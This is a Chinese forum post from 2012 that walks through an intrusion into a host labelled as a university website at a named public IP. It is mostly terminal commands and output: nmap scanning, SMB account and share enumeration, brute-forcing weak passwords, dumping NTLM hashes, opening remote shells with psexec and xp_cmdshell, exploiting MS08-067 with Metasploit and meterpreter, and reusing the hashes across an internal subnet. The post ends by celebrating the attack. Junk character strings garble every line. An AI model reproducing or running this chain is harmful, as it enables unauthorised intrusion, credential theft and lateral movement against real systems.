广西师范网站http://202.103.242.241/
- j8 s, R3 L( s! I/ r/ G: y
6 x, H6 I# l/ K$ C- u2 Y I4 lroot@bt:~# nmap -sS -sV 202.103.242.241
3 N. P7 Y7 K: G8 f9 s% c9 e/ h; o/ V2 i
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST3 s. m- J) p( L# W% c& d- V
, o) a/ }. a; ^% M
Nmap scan report for bogon (202.103.242.241); J; e* s( Y: x; O" k$ g% a' e* W( L' M
9 c5 s. O8 A1 A) l1 QHost is up (0.00048s latency)./ x8 t$ I. @8 ]& B8 }
3 J1 v* m# q' h3 D4 w5 BNot shown: 993 closed ports
5 Q. d% U6 m2 w6 d8 e/ A; i8 N" e$ P
PORT STATE SERVICE VERSION
7 \; T1 c" t) n* a) r; {& F/ T z9 \: ~
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
9 i7 d% g7 V! a: H' N, v" n4 s
6 Y& y4 h7 M0 n% f [139/tcp open netbios-ssn& i4 ?+ u; U* l6 ~& i8 P
# h6 I0 i. U, P) f445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
' V5 f7 D3 o+ J3 W: N1 O4 Y5 Y% i5 Q
v, E! p% I% y, t: J$ n6 _0 q1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)3 J$ ]1 I' e8 I' E4 Y
4 v3 D& v# V/ q- i4 ^; r2 t1026/tcp open msrpc Microsoft Windows RPC3 {' `" r$ U' x% d
& N ?+ G u c
3372/tcp open msdtc?
2 n; z0 R8 c: q* g9 P6 c, I# @
3389/tcp open ms-term-serv?8 ^; B8 I4 N" q; O% s& `% Q8 X' B, K
+ T6 t5 T* \: H, a! v
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :" V# N- N; I: Q% I
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r1 m9 ~. q9 K+ s( j
9 z' U: s U7 {( A4 V; R' y
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
9 T$ ?' M8 O0 R2 C( Z/ @5 M. S& _! @
U3 b/ [- h( `1 H( h$ D2 mSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
, c. P# J U5 x8 Y/ X, H4 F/ Z G+ D0 N" F& Q0 c3 q3 i
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO/ b/ k$ _# L: l9 x3 R1 U. r9 \
$ I$ r- s, m6 t3 W; ]% E
SF:ptions,6,”hO\n\x000Z”);
8 O9 G. e3 x- y" C2 o( v6 q9 {4 I5 O# n
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)7 W* F, C( p6 T( h$ H3 l
, C. F5 A& f1 J8 J. D5 c7 hService Info: OS: Windows
3 c2 k) c: G, p1 c) u8 q, Y: g+ U) |& x/ g
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
& x A2 f3 m4 b# j0 z6 P, v4 Z# M0 Z/ x; z( T5 j2 O( X
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
; ]3 G; T: t* B% g- @6 I
1 a6 i2 _: R2 X, W5 U+ Wroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
9 {$ m4 Z% t- ~3 ?, O8 X5 b
. C/ o* _* V2 }2 s S2 _-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
5 H1 o0 ^/ ~! J+ |( o/ k- [& Z& S9 V4 @) e
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse3 n& b @! d+ B5 H; e- A
q4 `, U5 }7 v$ D-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
! ], m7 b. c# u: ?& T- J- J" j4 k: c0 q, ]1 \
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse3 n$ e3 O/ W7 Y, w
1 v2 `" r: r& ^1 n- W
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse* ~3 K( ^8 H4 E B7 W
( I% K4 G4 `; m+ W2 |-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
& z1 V+ Q+ R+ Z% e6 J% {8 N( x; t T" L$ ^/ s) u3 `
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse4 e. g& u& R% y' U. W6 G! \
1 }1 `" O5 f5 Q" }) t2 z-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
$ G8 i8 q8 f, h% u0 C: u
# m. F0 y( l* j1 u% B, F0 u-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse2 F' j' y6 Y4 [& ]: F E
6 _ b K7 f1 D' Q. ]* D. `
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
3 {; ?5 F7 w8 l& H" x7 G2 v% U( {4 H) }# f! w* d$ g( s0 j
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse) J( v* m) E/ u+ @3 h
[! G* [2 Z3 r-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
( U, X% E; H8 K# I5 S
6 g+ y7 f( @" \-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse3 a$ d3 ~" i; }) u
" h9 ?4 V$ o3 m. l-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse; Z: U0 ^0 t. h1 ?9 Y6 n
5 s& [4 Y( S$ L
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
7 v9 A" p; i+ w3 j9 P! y8 x# |& S8 r. d ]9 B1 n5 T/ R
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
# H4 m' d! H( V" G, z5 N% O. Z2 z0 w* r
//此乃使用脚本扫描远程机器所存在的账户名
# y( O9 ~/ B- K5 j
! T6 {$ Y* C4 i' IStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST' c; n- S6 O& }7 q) ]3 N9 ~
* V( s& s. Y6 c
Nmap scan report for bogon (202.103.242.241)- X" j% u8 D& ~ w* @) @
x- ^$ B7 E8 }" A7 z3 |5 ?
Host is up (0.00038s latency).
$ N0 S" w& e V; h& X1 p" _# k
5 d# e* b; K- m, y, ONot shown: 993 closed ports
7 d9 A b2 `1 [; M: T3 J! U7 X+ b: d. W- @" c
PORT STATE SERVICE
3 V [; k, L/ v* U3 e& V" _2 s H9 g" O) E
135/tcp open msrpc3 {; R7 v4 I8 K( ]8 q L
9 s% _9 Y+ e* ]/ j" F' q139/tcp open netbios-ssn) X- ~. K) F- S' U
) L0 X8 n% A1 B0 f# T& Q- c
445/tcp open microsoft-ds
5 v& Y( n# q7 T6 `6 z
$ p a1 \: F1 l" Q1 q& K1025/tcp open NFS-or-IIS, A2 b$ K2 E" Q- I4 C; E
/ q. N ]. t3 P$ m1 W, R X
1026/tcp open LSA-or-nterm
% D; S* k8 P; h& j$ Q1 i h; `9 r
$ K0 R. Y5 i* ?3372/tcp open msdtc% G# i! n( f. r6 s! K
5 U2 f5 E* H8 R5 G' D) D t4 g9 C' M3389/tcp open ms-term-serv
* T9 ~- Y, y1 Q# `6 i9 w' @( ^8 N& l5 U6 H/ P3 n1 W5 K
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- @9 b+ N% p0 R, E0 H0 U
3 @! z3 t1 l; j9 V
Host script results:2 o- d: T) @# ?6 V- `. l' r7 M' m3 D
) a& U" ]+ J$ t# W, T7 i| smb-enum-users:
" i8 ]" F8 L3 \( ~( f8 x
- r! e% i& Y1 k) D- Y$ p|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果; |( Y i* F- t% C+ t; j, H
! q. J' z" x) e0 b9 }Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds" _7 P' E& y) ]. m! _3 o
. F; h/ `9 j8 S$ e+ W) x
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
U, R9 K6 w: N& q) h( p. @/ }/ C1 R7 S- G$ n7 s9 t
//查看共享0 e& u+ J9 q( h: o
9 v3 F- E4 |! h+ m& C$ xStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST* K: I4 Y1 K3 s& I2 m: e5 I5 w# R
9 W' H$ e+ J+ |
Nmap scan report for bogon (202.103.242.241)% C7 _5 q# g, L6 t5 ^- X, w3 H: {
$ f; E4 n$ q( MHost is up (0.00035s latency).) p# r. J( x2 O5 {1 r" \, \
$ d+ x3 ~) `* r) WNot shown: 993 closed ports, l2 s$ H' E" f, z3 }$ E; k: A o
9 [ t. X# [* SPORT STATE SERVICE
?" l+ P# z, y. X2 R' r3 s! M. n& q* O, F; ]9 m1 y
135/tcp open msrpc5 T7 j% P/ N2 L. E R. ~* [0 j8 S
9 k+ b, t) Y$ b( \ S& g139/tcp open netbios-ssn9 u' p; a( I. C* Y5 S9 d
) Q# {0 S( Y+ O( G) I% p445/tcp open microsoft-ds/ \# C7 Y8 }0 \. \6 K9 }' [
0 I0 c6 M( G( n8 S" M! E1 J) l% l
1025/tcp open NFS-or-IIS
; b. n6 e0 V% o* x) |0 g1 S0 F+ \
! t1 T" y0 m+ U% l( Q! _8 {1026/tcp open LSA-or-nterm
D/ b( O4 N8 X% b0 | D3 j: m7 n/ @: ~& P
3372/tcp open msdtc
6 C' m) n' N* q& E3 n% E9 ^
* ]4 _. }$ F" F( L3389/tcp open ms-term-serv
. U) {( q) ^5 F c u0 w. T8 r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' \2 \3 T8 y- {' s* J5 `: c6 M- ?2 u, Y0 Q8 o1 Z, Q
Host script results:
. {+ A' _' Q" m+ h
E, W. w7 f( E2 i; O| smb-enum-shares:
" m, C! h# b! u) f/ e( Y6 z& e9 [5 j0 s$ o& V& n
| ADMIN$
7 l+ l6 L( D, ~' J( d
" l7 }" N0 Z% t* |3 ^! A9 L7 J, f: d| Anonymous access: <none>
0 S' `* R M7 k$ c0 E: c2 b/ C m6 S# S; C
| C$
o0 R7 P3 o( H& F4 X, X9 J
. ^; F6 y- ?+ ^8 @& K0 ?| Anonymous access: <none>
6 ?" p4 c- W. w' u! ~
( ]- _7 Q; U+ o5 x9 y3 e* C% j| IPC$
+ g. m# e4 i* G8 H9 X. _' G$ J8 l7 g$ R p9 V; M' O! ~9 N
|_ Anonymous access: READ3 H: ^, s: x/ K: L
+ c9 p4 u8 ~* V- g% P4 n8 o, y' A
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds3 L; T( @ u* N# k2 p- R3 U6 E
5 [+ _2 }0 V( X: w: j5 E' O2 Sroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
. J$ p* C0 \/ ^& i) H8 O# p4 r3 c
& y/ ]0 _/ r: T- s- `) ^0 M) O* i//获取用户密码
: n4 L. A. O5 o" \
5 [4 x* _0 }9 p9 kStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST ~+ D8 s+ W5 a" U0 r6 L
/ Z% N' O2 i( `- uNmap scan report for bogon (202.103.242.2418)& Q/ k3 K9 J( _1 I, M# h
( @* s3 U: N3 {7 z8 f. iHost is up (0.00041s latency).1 F7 P; L N y K
: ?8 @4 U% X' _, _9 H7 CNot shown: 993 closed ports
* g# v' X/ B, B! l3 x, L! p5 d( b5 G( \ M4 D& z8 l
PORT STATE SERVICE, ^, \) j, j& Z- Z( I
3 D7 j4 ?0 J. y: f- ^5 H" u
135/tcp open msrpc
. j' k& O4 n4 |9 \" Y$ n T9 Q# _$ [
$ E% g1 z( w5 D6 m) K139/tcp open netbios-ssn Q) p x/ q" q; ~( @9 {
$ I. R5 j/ P- f z; i- K. B5 f
445/tcp open microsoft-ds
+ z* c" k0 {: w
. Q, X% B. B1 n& t* _" x5 c; X% f1025/tcp open NFS-or-IIS/ O u& U( r, {) I# P! [& Q
2 Y+ ^" p& o/ \7 r& y$ H
1026/tcp open LSA-or-nterm2 X6 K9 j% B9 ]0 V! P
3 a6 A, _2 c( o7 t. d [3372/tcp open msdtc
! E: }' b8 ^4 ^$ h% F# F9 H
% L! X4 o V' y6 N3389/tcp open ms-term-serv( t% W5 J" F$ `( \* }' ?7 W
" \3 p9 Y+ { e/ y$ R9 I3 \. h: u
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)" h; { B" G# n9 I# {6 T z) H
7 d4 N4 }! h' B; |
Host script results:
% A ? O; y0 f4 A% g
1 z* f$ @4 [% I1 g: S5 || smb-brute:/ t7 o- O' ?+ v/ _0 s, |* t
( e" a; g/ u x0 I- vadministrator:<blank> => Login was successful" c$ z- ?! g* i m6 d
& i) y! M: C7 O( A! ]6 u
|_ test:123456 => Login was successful
' K3 y; S7 A# |3 O
$ G3 ^3 `* [5 iNmap done: 1 IP address (1 host up) scanned in 28.22 seconds4 M0 V: Q5 ^ g7 C7 P: a, U
8 K4 g# ?. r) E( t! @3 proot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash7 |4 n0 d- `1 L: ?3 J1 _% ^( A7 f( X
4 o- F' P6 K4 n0 sroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data8 a1 [ P/ v: Z" \( V: B
5 @. n0 a3 Q+ T2 }7 \" u0 E
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse6 N0 N0 _1 Z9 M
5 `2 {6 }3 W( E( Q: E% n! ]4 ]root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139$ {% q% a& j' V, Z- K" H1 }+ o0 l
. d' x2 ~4 J# Y& m8 i rStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
@+ r7 @$ Y6 M5 W( v; v
/ s& q3 b, |% G, m: w! z+ nNmap scan report for bogon (202.103.242.241)
/ |4 y# r3 ^- T/ x- n$ \" |
* V+ f' D, i2 A, J DHost is up (0.0012s latency).0 `: b- S8 N5 o0 }. q$ j
7 e6 O+ G( d( U+ n5 B; b
PORT STATE SERVICE4 M9 Y' T: x5 L; _2 z2 [9 `+ ^
8 @" \" d& Q% i# t, y8 O
135/tcp open msrpc) k6 C! q: U: f- E9 M! n5 _% c
- `) l8 |1 d' p139/tcp open netbios-ssn
& v5 b9 ?5 N( y& _& l; B
% |1 r: Y9 r& K' p* r445/tcp open microsoft-ds& p, |0 A1 c: C( S0 J3 Q4 X/ f! [
5 p: _* g! X5 @) U0 b3 f
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( A+ h- e. L% L% K1 ?9 j0 J/ J
, }$ r! Q0 l: GHost script results:) x9 `8 x; n- m+ I0 d* E9 r8 Y
6 X5 {& x! z/ k+ {3 Y E3 L6 Y; v4 w8 H| smb-pwdump:
* U% C" _) b0 p9 W) F% n" F0 v' [3 X9 h8 v8 }+ Y* R1 W2 O" P. B- |8 U+ r
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
9 I$ x L9 E1 F" K& n, [
3 X h0 V$ I$ m+ h# z5 Q| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************$ b) f a9 |; ?9 K: n
! o9 f# m- m8 ~& L7 Y
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4; M0 Q- H* P4 u" V# G# y
% S" Q2 |( Q i) {|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2$ m4 S2 \2 ^3 `+ A# `
; \# @9 i& ~9 _9 F5 k' ]) o
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds7 p7 W; d. f/ \2 Z
1 p- d9 l4 f8 v. L
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell, t- ^+ o( c: U/ C
3 o- o7 E0 \1 A _7 v7 E9 L
-p 123456 -e cmd.exe: M2 A8 V. {8 `1 _
# A* h: K5 V% g3 ~( o! O7 Z
PsExec v1.55 – Execute processes remotely( L7 O, x, k( J2 w' s# |
, [1 w5 g$ E# P3 ?) UCopyright (C) 2001-2004 Mark Russinovich0 I$ _* e, j) k0 e3 |$ q- n
T. t; U8 F, d( A( {
Sysinternals – www.sysinternals.com4 d3 r* p- ]: k6 U
/ r! j! l, i4 C8 a. `& V5 T
Microsoft Windows 2000 [Version 5.00.2195]
9 C9 }. V8 }" \( S- a; {9 x, M v
6 Y% x; R3 `( K7 P4 ](C) 版权所有 1985-2000 Microsoft Corp.
2 X7 T( }1 ^3 ^% C1 C, @
! R( w7 p! u( A: v. x& m) G% o; PC:\WINNT\system32>ipconfig
; N K7 w$ ~ X9 v7 c% }( O/ c% p# b
Windows 2000 IP Configuration
$ W8 r; I9 i u' k! Z- Q" r7 Q( H6 t' s& I( p1 ~1 x! U
Ethernet adapter 本地连接:
4 u1 H' R# a" ^ I+ \, {3 b, r" g: R3 j9 N
Connection-specific DNS Suffix . :7 p( \/ h* Z- E! g' U* p
$ [" ~8 S0 L- O! q
IP Address. . . . . . . . . . . . : 202.103.242.241% N; U1 w& t, N5 @* s2 L" Y
$ `: t# s1 X( j/ g! w5 ]" a( r
Subnet Mask . . . . . . . . . . . : 255.255.255.0, v/ ]$ D1 O! P. E1 B! ^: l& b A
' I7 \( }: [* B# Q- x8 O
Default Gateway . . . . . . . . . : 202.103.1.1
x! u# b8 n6 ]" E
/ A0 b( ]" q* D: eC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
% t" B- X2 K: I) |/ {" w5 I d5 d3 c
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
& W2 p, x4 C) W. l; G1 i% {: @' `: A, i/ {, o
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
) l& W9 i1 i$ y, Q6 S
4 S9 U4 I" G0 {3 P; Z* B& U3 ~Nmap scan report for bogon (202.103.242.241)' m$ \% g) m6 O; q2 X: h9 J* Q
`% U. W* }% Z& E% {Host is up (0.00046s latency).
7 W v7 }# ` o* d/ i9 l! P: M7 I9 n) l0 L$ i
Not shown: 993 closed ports
6 W4 z4 R# B, L- r% f4 b3 K( w4 \5 }$ V' R# X& j4 q
PORT STATE SERVICE& `; l2 G9 \2 {9 y# _
, R4 g& r" J% X' O
135/tcp open msrpc0 b" {: h# U# g" @+ d3 S N
$ j* J; j# s0 q" i3 ]0 G139/tcp open netbios-ssn
6 P. z8 n2 I1 v
& V6 y0 `0 B" M0 [' D5 w% p& O- L! @445/tcp open microsoft-ds9 x! k2 c7 |7 X8 Z
8 g) r4 [; ]8 f" j& ?7 ]; B1 O# y1025/tcp open NFS-or-IIS
/ _" w8 X1 i8 D7 H% g" o' {4 ~& [. x5 a: ]* e3 E+ `& v
1026/tcp open LSA-or-nterm' {7 X- s1 S! H2 T( R/ h' j
! J7 x/ V( g4 v; }0 d5 o. }- P0 f
3372/tcp open msdtc
, t! }% g5 D9 X" t4 u% ^& [( B, G2 O! f/ m
3389/tcp open ms-term-serv
% [& J+ i# ]5 ]
]: m& R2 _7 Z) E2 o1 [MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 k7 e, B: h6 O# G1 x) r# a, W# Z3 n7 m* C1 z: W: f; N
Host script results:
3 V# U' X% U: X/ }0 `4 S. `7 S. g2 u& ?4 ]
| smb-check-vulns:4 T4 U5 D' J; h8 _; R" p1 K
0 w/ [" E! \' s+ L4 w! k- u/ H! ]+ e|_ MS08-067: VULNERABLE6 N( [ f; {6 p8 Q9 b: X- M V
) p+ k8 d7 Z$ Y8 d7 A
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds E3 O# Q/ u) @* z0 s( {! r! [$ {& X
7 X! k5 C/ }- Q
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出* `& j( V( }% I1 f' D) ?
# I/ y7 I% d) b" p' ^msf > search ms081 P& |2 ?( z* L, J
0 ^" K% t+ f: N' I o% F, V
msf > use exploit/windows/smb/ms08_067_netapi( \( Y/ p+ Q% Z7 U4 p
( w. r- r: P4 I g( u, ]
msf exploit(ms08_067_netapi) > show options
; N; R: D4 J M7 w
! ]' k! ?7 d- jmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241* Z4 b7 S! L' J& C6 U8 M9 X
% z; n, M& D3 Imsf exploit(ms08_067_netapi) > show payloads
3 B$ p' q5 B1 C ?8 h! w4 O1 D
/ g2 H) Y% ]' ^7 B+ |# z% vmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
+ R; @) k" x6 D7 C+ S4 b: X. O# H- o3 R# @! t0 E
msf exploit(ms08_067_netapi) > exploit
* B! V) b& J' P6 q+ ^% W$ C" F) ~0 Y) v: x4 _6 y( t$ @
meterpreter >
+ |) S- f. e: r7 v3 w* a+ x, w
* N3 j, F8 s' W" y2 Z1 FBackground session 2? [y/N] (ctrl+z)
7 W! p* a d2 { \ m5 C# Y, m7 ?2 A- c/ L; I
msf exploit(ms08_067_netapi) > sessions -l
/ a& j3 e. H" d& |! z9 V9 }' C6 N7 F# b: P
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
: e. ~$ Z& {7 w
( R) Z: H) |* f1 btest
) }/ Q, o% I" S0 Z8 S4 s o8 r+ D7 o
& M0 B1 r# l# J+ H3 ~$ d& Aadministrator: ?2 S/ o* E% C& a# ~; N5 z
! o1 ^1 _+ S# G' x2 Z! R6 j" Q kroot@bt:/usr/local/share/nmap/scripts# vim password.txt
! q6 e G( c4 h3 N1 ?+ j" k# w$ \8 W! L( k# I( e
44EFCE164AB921CAAAD3B435B51404EE7 g- x# G3 S6 [ u' O, `
6 F) m A) z. ?" F/ d* S: nroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 6 j2 ]4 D9 ?; e3 y; Q
. g% Y6 X, b: d, |. M$ r: n
//利用用户名跟获取的hash尝试对整段内网进行登录
. X; |8 C. R0 c. |, ]; N
& n' Q: n& S# y7 NNmap scan report for 192.168.1.105
3 J* v) z' K6 x X. a* v- p) U& n+ G3 W, F
Host is up (0.00088s latency).' ~/ [3 ?) A- D2 E) c' v. e8 E
# y% z! d& F+ s* fNot shown: 993 closed ports& K) p7 X, @' E: A! z
5 x4 X" w1 }# X. Y# `. T ?& QPORT STATE SERVICE( }. ], P+ g9 f; K9 K+ ?
# Y; }& j' s) @# o135/tcp open msrpc
1 Y( D/ s4 }; b7 Z/ D2 r' m; K; C! [8 B0 |+ \
139/tcp open netbios-ssn4 n6 `6 B6 V8 E
' l3 m2 n+ }/ {: C445/tcp open microsoft-ds! t8 }* T" W2 ^( m) Q! H8 g
7 A4 f% Q% Z, P; Q3 k1025/tcp open NFS-or-IIS! i+ z. t/ i# V; G! v0 j
! V& f a$ E- P) ~' z) c
1026/tcp open LSA-or-nterm
: J1 \2 B2 K0 A% ?7 ?8 Q2 M2 w0 g. }4 L- U% ]7 W. g
3372/tcp open msdtc
" }. _& R0 ]# Q" }1 ]( T/ J3 P" H- Q/ m* \2 P8 y
3389/tcp open ms-term-serv" I6 @( {8 Y# h9 k& f6 i/ e
, ?6 n# B+ x7 }
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
m$ H/ c2 {1 ~! o' R& ?2 K1 f, r1 m, s9 j, p6 \
Host script results:
! S9 z! v: O# m9 D& o6 f' Z; Z! T) B. w4 C- H3 k2 ~( r# w
| smb-brute:
0 N X8 n9 x7 }; c& V# p' w9 @- h! y( X7 M
|_ administrator:<blank> => Login was successful$ h: J5 D3 `5 ?, X% P+ Y( A
/ K$ f. \9 d% \攻击成功,一个简单的msf+nmap攻击~~·) M' p% q; V2 r6 [) J3 E' p
2 n a& U- C0 F |
发表于 2012-12-4 12:46:42
收藏
支持
反对